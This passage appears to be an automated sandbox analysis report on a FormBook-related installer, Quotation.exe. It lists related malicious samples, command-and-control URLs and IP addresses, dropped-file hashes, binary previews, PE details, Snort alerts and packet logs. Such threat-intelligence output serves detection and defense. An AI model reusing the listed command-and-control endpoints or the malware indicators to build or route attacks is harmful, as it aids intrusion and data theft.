                                              • www.concur.design/uds2/?Y4spQFW=n2X6clJmCA05S3ZeqrcWmU9LgTYh3Xo9IMSlcPg8h+SS+WcZ+1zi1nXkqGc0mRUifak24jBbuw==&Ezu=VTChCL_ht2spUrI
                                              0XrD9TsGUr.exeGet hashmaliciousBrowse
                                              • www.madbaddie.com/csv8/?RRm=bmU6bhxvgrtQDLdFrXfZu84+YLpNz+FpUYa4sbpu+DXpESkC+J6KAuS4IExlqjj6N4cMeGxZJA==&rV0DPf=8pMPQ6
                                              kqwqyoFz1C.exeGet hashmaliciousBrowse
                                              • www.pnorg.net/jskg/?9roHn=FFllKUI2Vy3AcuNhWrh4fKbis3luBqLkf2wubdQ4CJ+GPQXPDvWWudAI4bM3GwbQsdH4&npHhW=3fq4gDD0abs8
                                              jEgLNI40Ro9O775.exeGet hashmaliciousBrowse
                                              • www.nautilus.photos/e66m/?Qzu=/jbGnlKlCl+kfGg+6TwKlRO8yGA+aFIV4OcnMw7A2/lyvNgUFCY9EZaTm252tDySX7Bu&tZUX=QtxX3N6pmn8HFjP
                                              hlNvQKaRR3.exeGet hashmaliciousBrowse
                                              • www.freshlookconsulting.net/jskg/?yN6Ddr1H=7pn97mLWvkMXGDEchdpcgW9NAJQehO/Pf6j+f8BObvafep31f10mg4FYeAaWQcAcoJTm&8p=2dOPB6nHz
                                              hO3eV0L7FB.exeGet hashmaliciousBrowse
                                              • www.accessible.legal/csv8/?lh28=O0GliFfpjJXxzb&LXe09=oGqbtMom9WGYi+RBhVD/q4yy78sx6VM5qFnCf+91Xqn8W7yN0ac+rgSlx9DJFvjgpGDVDlUe9g==
                                              U0N4EBAJKJ.exeGet hashmaliciousBrowse
                                              • www.madbaddie.com/csv8/?Rh=8pgDCRypynATXZ&cj=bmU6bhxvgrtQDLdFrXfZu84+YLpNz+FpUYa4sbpu+DXpESkC+J6KAuS4IHd12S/BKN1d

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              parkingpage.namecheap.comPO-RFQ # 097663899.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              Betaling_advies.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              gqnTRCdv5u.exeGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              eQLPRPErea.exeGet hashmaliciousBrowse
                                              • 198.54.117.215
                                              PaymentAdvice.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.216
                                              Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.215
                                              TACA20210407.PDF.exeGet hashmaliciousBrowse
                                              • 198.54.117.212
                                              46578-TR.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                              • 198.54.117.216
                                              SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                              • 198.54.117.217
                                              1517679127365.exeGet hashmaliciousBrowse
                                              • 198.54.117.216
                                              BL-2010403L.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              Shinshin Machinery.exe.exeGet hashmaliciousBrowse
                                              • 198.54.117.212
                                              PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                              • 198.54.117.217
                                              INV-210318L.exeGet hashmaliciousBrowse
                                              • 198.54.117.212
                                              Inquiry.docxGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              BL Draft copy.exeGet hashmaliciousBrowse
                                              • 198.54.117.215
                                              Order.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              PO.1183.exeGet hashmaliciousBrowse
                                              • 198.54.117.211

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              NAMECHEAP-NETUSPO-RFQ # 097663899.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              Betaling_advies.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              nova narud#U017eba pdf rvP6N.exeGet hashmaliciousBrowse
                                              • 63.250.37.200
                                              gqnTRCdv5u.exeGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              Calt7BoW2a.exeGet hashmaliciousBrowse
                                              • 63.250.43.5
                                              eQLPRPErea.exeGet hashmaliciousBrowse
                                              • 198.54.117.215
                                              vbc.exeGet hashmaliciousBrowse
                                              • 198.54.117.244
                                              000OUTQ080519103.pdf.exeGet hashmaliciousBrowse
                                              • 198.54.126.159
                                              PaymentAdvice.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.216
                                              Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.215
                                              quotation.exeGet hashmaliciousBrowse
                                              • 162.0.229.227
                                              PU Request Form Hardware.exeGet hashmaliciousBrowse
                                              • 198.54.126.165
                                              URGENT INQUIRY.exeGet hashmaliciousBrowse
                                              • 198.54.126.165
                                              8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                              • 63.250.38.60
                                              8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                              • 63.250.38.60
                                              8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                              • 63.250.38.60
                                              Protected Client.jsGet hashmaliciousBrowse
                                              • 199.192.24.250
                                              one new parcel.exeGet hashmaliciousBrowse
                                              • 199.193.7.228
                                              Protected Client.jsGet hashmaliciousBrowse
                                              • 199.192.24.250
                                              DXTL-HKDXTLTseungKwanOServiceHKnova narud#U017eba pdf rvP6N.exeGet hashmaliciousBrowse
                                              • 156.235.148.136
                                              AQJEKNHnWK.exeGet hashmaliciousBrowse
                                              • 103.97.19.74
                                              vbc.exeGet hashmaliciousBrowse
                                              • 154.86.211.231
                                              PaymentAdvice.exeGet hashmaliciousBrowse
                                              • 154.219.109.119
                                              BL01345678053567.exeGet hashmaliciousBrowse
                                              • 45.192.251.55
                                              pvUopSIi7C5Eklw.exeGet hashmaliciousBrowse
                                              • 156.245.147.6
                                              payment.exeGet hashmaliciousBrowse
                                              • 154.219.105.199
                                              New Order.exeGet hashmaliciousBrowse
                                              • 45.199.49.95
                                              BL84995005038483.exeGet hashmaliciousBrowse
                                              • 45.192.251.55
                                              SAKKAB QUOTATION_REQUEST.exeGet hashmaliciousBrowse
                                              • 154.86.211.135
                                              SwiftMT103_pdf.exeGet hashmaliciousBrowse
                                              • 154.84.125.40
                                              1517679127365.exeGet hashmaliciousBrowse
                                              • 154.219.193.141
                                              SB210330034.pdf.exeGet hashmaliciousBrowse
                                              • 154.81.99.74
                                              Purchase Orders.exeGet hashmaliciousBrowse
                                              • 45.192.251.43
                                              QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                              • 156.239.96.43
                                              Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                              • 45.194.211.92
                                              proforma.exeGet hashmaliciousBrowse
                                              • 154.219.105.199
                                              xpy9BhQR3t.xlsxGet hashmaliciousBrowse
                                              • 154.80.163.105
                                              oQJT5eueEX.exeGet hashmaliciousBrowse
                                              • 154.214.73.24
                                              MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                              • 156.232.242.149
                                              UNIFIEDLAYER-AS-1USRFQ_AP65425652_032421 isu-isu,pdf.exeGet hashmaliciousBrowse
                                              • 162.241.244.61
                                              PaymentAdvice.exeGet hashmaliciousBrowse
                                              • 108.167.140.96
                                              PRODUCT_INQUIRY_PO_0009044_PDF.exeGet hashmaliciousBrowse
                                              • 192.185.164.148
                                              PO.exeGet hashmaliciousBrowse
                                              • 162.241.24.122
                                              0BAdCQQVtP.exeGet hashmaliciousBrowse
                                              • 74.220.199.6
                                              TazxfJHRhq.exeGet hashmaliciousBrowse
                                              • 192.185.48.194
                                              vbc.exeGet hashmaliciousBrowse
                                              • 50.87.195.61
                                              PRICE_QUOTATION_RFQ_000988_PDF.exeGet hashmaliciousBrowse
                                              • 192.185.164.148
                                              PaymentAdvice.exeGet hashmaliciousBrowse
                                              • 198.57.149.44
                                              PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                              • 162.241.61.249
                                              Aveo 742.htmlGet hashmaliciousBrowse
                                              • 162.241.124.93
                                              Bridgestone 363.htmlGet hashmaliciousBrowse
                                              • 162.241.124.93
                                              nunu.exeGet hashmaliciousBrowse
                                              • 192.185.162.134
                                              GS_ PO NO.1862021.exeGet hashmaliciousBrowse
                                              • 192.185.90.36
                                              Payment Report.htmlGet hashmaliciousBrowse
                                              • 192.185.195.15
                                              receipt-xxxx.htmGet hashmaliciousBrowse
                                              • 162.241.124.32
                                              Order-027165.exeGet hashmaliciousBrowse
                                              • 192.232.218.185
                                              Ewkoo9igCN.dllGet hashmaliciousBrowse
                                              • 162.241.54.59
                                              49Bvnq7iFK.dllGet hashmaliciousBrowse
                                              • 162.241.54.59
                                              OtOXfybCmW.dllGet hashmaliciousBrowse
                                              • 162.241.54.59

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\6g13vjbdoi2ehkg8yw6
                                              Process:C:\Users\user\Desktop\Quotation.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):185856
                                              Entropy (8bit):7.999056053420569
                                              Encrypted:true
                                              SSDEEP:3072:iNQRASwtGpaYuz7czLmKdkKAl0L+pDuYFjQEniZ1mNsQwC6j/CD99J7K5ZGsaNYm:iRdtGpaYuASMk6+tuYqZ12sQP/9K5ZG9
                                              MD5:F96E5B318FD7258CB56A79C4C84324F4
                                              SHA1:4B724664C48D73F2A7FA125805E0538FAFB8462E
                                              SHA-256:BFF10860E3F16A093F8CD094E04664F815C12CD49561AB87A88EAA2498B38251
                                              SHA-512:40FBA8DFEDDECC528D096ED0E0BD501F77B52F10674E0335F5C70CBCD94E9D107CFF5F028D1E1821C3AE20DFA4A00554433EA5B6BE18D755DD7F522AC659700F
                                              Malicious:false
                                              Reputation:low
                                              Preview: .-...D...$5K....TiY.w9...jJ./.kPd.V.....{.S..s).........X.C....V5...fB.n2..>.-.7..f..hm3</#.........081..=.=.........CM....P..t.l...4..c.Z.e...2...{P..SQ.#P..f..Xr..V......p-H...<.z.!.!.......0.........Gm..f....f..].R.......*.(v......s$s.x..z.v..4.....xL2.;\Y(..Bc... ./.A.h._}.Q...g..+E....:..z....5..\.).m..&. ....!..nN...X.......9..j...^.....y...w.vH....X@.*.j.. .#x..T%.8.....+..0.#x...n..8..o<.."..#5PL3....C.\...s....L7Y.V.....k...y.S.....t.s..v5..Wv..'......]..5...&u...h&[..:k.......U..>..t.6V0...TU.n....=......YE^..^..........M.I.....:.....G....Sy^..].Z$.,.......F..%.n..)t.../..r..).J7lz...@..4.~$?D.>$..I.....k.........^..6...M.n.K.'J....}qo<.k>.aSZ.aU.......{z.....*...YH.......,......7X..$....Vi....f...7J.eOg..@..0t_..9]m.l.y..0L..q.tF.&.......M.S*._.qt...B.n..j....V.....>.q;]..wYr....Akg .....m.....?l...)..S.B.?y)..,$Q.i...G..........C3J(..~.....u...pf.+.+../_..A.Q.w.|..K.m.9K..N.zH...+.PB...8`a.J....?.4.N....`5...i.f.@....y....
                                              C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll
                                              Process:C:\Users\user\Desktop\Quotation.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):5120
                                              Entropy (8bit):4.158236328405185
                                              Encrypted:false
                                              SSDEEP:48:StXhoVLATc3cFa6PTh7SKFt5ET9TbOGa4zzBvoAXAdUMQ9Bg6RuqSqHSnM:nVLATc3z6BD5EhTiGXHBgVueaxBHSM
                                              MD5:F68CD7EF81A40B6DC714658AEF692640
                                              SHA1:377095C12352BEA1CE2AA195F4354270F8571767
                                              SHA-256:B0511BD682E5D539F05BE2C97D5E8E23DDDC48CC32AAA6C25B6A6ECEA4DEE475
                                              SHA-512:4C412EB6C9B01FFE57B582373703864448DB10B86D69A8B5AB9F2933917E6FD9FCD6124FF17A6A605A1C6D6569EA22DF1B80877BEF61B43F8D59B248D8791083
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 13%
                                              Reputation:low
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L...'.n`...........!......................... ...............................`............@......................... !..P...\".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\tqph8ojuftde3
                                              Process:C:\Users\user\Desktop\Quotation.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6661
                                              Entropy (8bit):7.973833328167563
                                              Encrypted:false
                                              SSDEEP:192:f9GMw7lP6AfdFoGNxCDNNFFJ9HhXr0kfZV4kKHHlkHirmU:fMxp6Afd6CCDFxBfLKHHOU
                                              MD5:C786E7452E59B23515152DAA0BA0F81C
                                              SHA1:9EB1075E3830E9021352E246668B47E6965483F9
                                              SHA-256:605A0E21D422DC245CBE890D7E714961C32A2D657DDDFA3B76282051431578FA
                                              SHA-512:D20482CB2EA748BC4D105E9FA93E2F104477CC37EE2674336DB78AF9427565BA6AFA5BD305B993964F641EEA92E9F95EE5A1A30F8E7AD4230B08081938F65277
                                              Malicious:false
                                              Reputation:low
                                              Preview: .....D..EzO.y<.tQ!.G.[... x-.$ni.af.q.j..H..]...@;...N...CBF#k.......g'&%....>........,.G..i.......QPG......onm......ut{........q.......YXO... ..WVU....)c..#.W.../G..9.`..B.sA@7.....C....!B!.FQ.....3.8TW......?.^....T:@EqTdE~-R.].z{FW.6.WyG`.?.h`\q.H.azaV.Q.^ZJs.Rj.B3t.[y|.8}i,|M.u......n.[nV.A.xR1..&....../#.....CB1...:=..................]\c......KJy........w........~}......edk.......SRa.....)(.....0+....Pr..2..-,.IC...(.4:..PG........<.Y...i.......=$'e(.S.,I..`......u8tc....p........|...d..!..m.......eQ...M~;/z.R...7*).."...:Y....'......L..**.U.>.72|X..<.+*.....|...7.`c).$...c.XG..ps...xon.9..C..qh.........*s.....d.1._.i..!.p`WV.Pm"...%............8/.....6E..J.C...........w;7y.!.....Yo2.g..m'?e(..U.e_&.o.....9.;6.;.`...L...=.x..{.{P...Q6t.-D".$.... ..f...g[.T....8.11.Z......".....<..~.3..I.x..SSRQ;.....v.! ..`.b.`..e.k.i.G.....LPon.l....w.@.h.~}E..mqp.u....|kON.L.aa..VUT.a...Y...\....s..3.2.-.z..@..5.:..I.7...?6....|.%.b..Wl.,nu.f..?.Y..V....

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.919658800710345
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 92.16%
                                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Quotation.exe
                                              File size:228099
                                              MD5:1f86caaa19912ceb55c9f6121eb692bb
                                              SHA1:2d4dd95fdb17937b22a3d6a41862704ed80acf70
                                              SHA256:8309d803c92faaf24828cd67e4c1041f9465ecf6c63f7608d7ed4579f075a02c
                                              SHA512:720c68b543c3d5eb2d026feb0ae46d0c77aa0eb71cd3302c520384cbff27e28fed1f9f0b3c761aed7bdea054fd2d3829f294f3250175d6d159d1167122f67a72
                                              SSDEEP:6144:NDIjkRdtGpaYuASMk6+tuYqZ12sQP/9K5ZGsaNY2TuZzHS:0knquAS/NN/9OXKY2TezHS
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........lJ...$...$...$./.{...$...%.9.$.".y...$.......$.f."...$.Rich..$.........................PE..L.....8E.................\.........

                                              File Icon

                                              Icon Hash:b2a88c96b2ca6a72

                                              Static PE Info

                                              General

                                              Entrypoint:0x403166
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics:
                                              Time Stamp:0x4538CD1D [Fri Oct 20 13:20:29 2006 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                              Entrypoint Preview

                                              Instruction
                                              sub esp, 0000017Ch
                                              push ebx
                                              push ebp
                                              push esi
                                              xor esi, esi
                                              push edi
                                              mov dword ptr [esp+18h], esi
                                              mov ebp, 00409240h
                                              mov byte ptr [esp+10h], 00000020h
                                              call dword ptr [00407030h]
                                              push esi
                                              call dword ptr [00407270h]
                                              mov dword ptr [0042F4D0h], eax
                                              push esi
                                              lea eax, dword ptr [esp+30h]
                                              push 00000160h
                                              push eax
                                              push esi
                                              push 00429860h
                                              call dword ptr [00407158h]
                                              push 00409230h
                                              push 0042EC20h
                                              call 00007F6D64B7E938h
                                              mov ebx, 00436400h
                                              push ebx
                                              push 00000400h
                                              call dword ptr [004070B4h]
                                              call 00007F6D64B7C079h
                                              test eax, eax
                                              jne 00007F6D64B7C136h
                                              push 000003FBh
                                              push ebx
                                              call dword ptr [004070B0h]
                                              push 00409228h
                                              push ebx
                                              call 00007F6D64B7E923h
                                              call 00007F6D64B7C059h
                                              test eax, eax
                                              je 00007F6D64B7C252h
                                              mov edi, 00435000h
                                              push edi
                                              call dword ptr [00407140h]
                                              call dword ptr [004070ACh]
                                              push eax
                                              push edi
                                              call 00007F6D64B7E8E1h
                                              push 00000000h
                                              call dword ptr [00407108h]
                                              cmp byte ptr [00435000h], 00000022h
                                              mov dword ptr [0042F420h], eax
                                              mov eax, edi
                                              jne 00007F6D64B7C11Ch
                                              mov byte ptr [esp+10h], 00000022h
                                              mov eax, 00000001h

                                              Rich Headers

                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x74500xb4.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x900.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x5bfe0x5c00False0.677097486413data6.48704517882IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rdata0x70000x11fe0x1200False0.465494791667data5.27785481266IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x90000x264d40x400False0.6669921875data5.22478733059IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc0x380000x9000xa00False0.408203125data3.93987268299IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0x381900x2e8dataEnglishUnited States
                                              RT_DIALOG0x384780x100dataEnglishUnited States
                                              RT_DIALOG0x385780x11cdataEnglishUnited States
                                              RT_DIALOG0x386980x60dataEnglishUnited States
                                              RT_GROUP_ICON0x386f80x14dataEnglishUnited States
                                              RT_MANIFEST0x387100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                              Imports

                                              DLLImport
                                              KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                              USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                              SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                              ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              04/08/21-13:37:04.612041TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.5162.241.24.122
                                              04/08/21-13:37:04.612041TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.5162.241.24.122
                                              04/08/21-13:37:04.612041TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.5162.241.24.122
                                              04/08/21-13:37:25.585048TCP1201ATTACK-RESPONSES 403 Forbidden804972734.102.136.180192.168.2.5
                                              04/08/21-13:37:46.323564TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.5198.54.117.216
                                              04/08/21-13:37:46.323564TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.5198.54.117.216
                                              04/08/21-13:37:46.323564TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.5198.54.117.216

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 8, 2021 13:36:43.587795019 CEST4971680192.168.2.5156.235.228.19
                                              Apr 8, 2021 13:36:43.848344088 CEST8049716156.235.228.19192.168.2.5
                                              Apr 8, 2021 13:36:43.848656893 CEST4971680192.168.2.5156.235.228.19
                                              Apr 8, 2021 13:36:43.849073887 CEST4971680192.168.2.5156.235.228.19
                                              Apr 8, 2021 13:36:44.109415054 CEST8049716156.235.228.19192.168.2.5
                                              Apr 8, 2021 13:36:44.111809969 CEST8049716156.235.228.19192.168.2.5
                                              Apr 8, 2021 13:36:44.111838102 CEST8049716156.235.228.19192.168.2.5
                                              Apr 8, 2021 13:36:44.111856937 CEST8049716156.235.228.19192.168.2.5
                                              Apr 8, 2021 13:36:44.112157106 CEST4971680192.168.2.5156.235.228.19
                                              Apr 8, 2021 13:36:44.112689972 CEST4971680192.168.2.5156.235.228.19
                                              Apr 8, 2021 13:37:04.466284990 CEST4971780192.168.2.5162.241.24.122
                                              Apr 8, 2021 13:37:04.611691952 CEST8049717162.241.24.122192.168.2.5
                                              Apr 8, 2021 13:37:04.611871004 CEST4971780192.168.2.5162.241.24.122
                                              Apr 8, 2021 13:37:04.612040997 CEST4971780192.168.2.5162.241.24.122
                                              Apr 8, 2021 13:37:04.757215023 CEST8049717162.241.24.122192.168.2.5
                                              Apr 8, 2021 13:37:05.120718956 CEST4971780192.168.2.5162.241.24.122
                                              Apr 8, 2021 13:37:05.306682110 CEST8049717162.241.24.122192.168.2.5
                                              Apr 8, 2021 13:37:06.178244114 CEST8049717162.241.24.122192.168.2.5
                                              Apr 8, 2021 13:37:06.178476095 CEST8049717162.241.24.122192.168.2.5
                                              Apr 8, 2021 13:37:06.178538084 CEST4971780192.168.2.5162.241.24.122
                                              Apr 8, 2021 13:37:06.178571939 CEST4971780192.168.2.5162.241.24.122
                                              Apr 8, 2021 13:37:25.360469103 CEST4972780192.168.2.534.102.136.180
                                              Apr 8, 2021 13:37:25.372937918 CEST804972734.102.136.180192.168.2.5
                                              Apr 8, 2021 13:37:25.374186993 CEST4972780192.168.2.534.102.136.180
                                              Apr 8, 2021 13:37:25.374999046 CEST4972780192.168.2.534.102.136.180
                                              Apr 8, 2021 13:37:25.387336016 CEST804972734.102.136.180192.168.2.5
                                              Apr 8, 2021 13:37:25.585047960 CEST804972734.102.136.180192.168.2.5
                                              Apr 8, 2021 13:37:25.585079908 CEST804972734.102.136.180192.168.2.5
                                              Apr 8, 2021 13:37:25.585359097 CEST4972780192.168.2.534.102.136.180
                                              Apr 8, 2021 13:37:25.585391998 CEST4972780192.168.2.534.102.136.180
                                              Apr 8, 2021 13:37:25.598359108 CEST804972734.102.136.180192.168.2.5
                                              Apr 8, 2021 13:37:46.026494026 CEST4972980192.168.2.5198.54.117.216
                                              Apr 8, 2021 13:37:46.200994968 CEST8049729198.54.117.216192.168.2.5
                                              Apr 8, 2021 13:37:46.201217890 CEST4972980192.168.2.5198.54.117.216
                                              Apr 8, 2021 13:37:46.323564053 CEST4972980192.168.2.5198.54.117.216
                                              Apr 8, 2021 13:37:46.497680902 CEST8049729198.54.117.216192.168.2.5
                                              Apr 8, 2021 13:37:46.497711897 CEST8049729198.54.117.216192.168.2.5

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 8, 2021 13:35:37.119110107 CEST6180553192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:37.131618977 CEST53618058.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:38.097498894 CEST5479553192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:38.110296965 CEST53547958.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:39.211736917 CEST4955753192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:39.224823952 CEST53495578.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:39.630197048 CEST6173353192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:39.648699045 CEST53617338.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:40.501914024 CEST6544753192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:40.515217066 CEST53654478.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:42.430141926 CEST5244153192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:42.442693949 CEST53524418.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:44.228476048 CEST6217653192.168.2.58.8.8.8
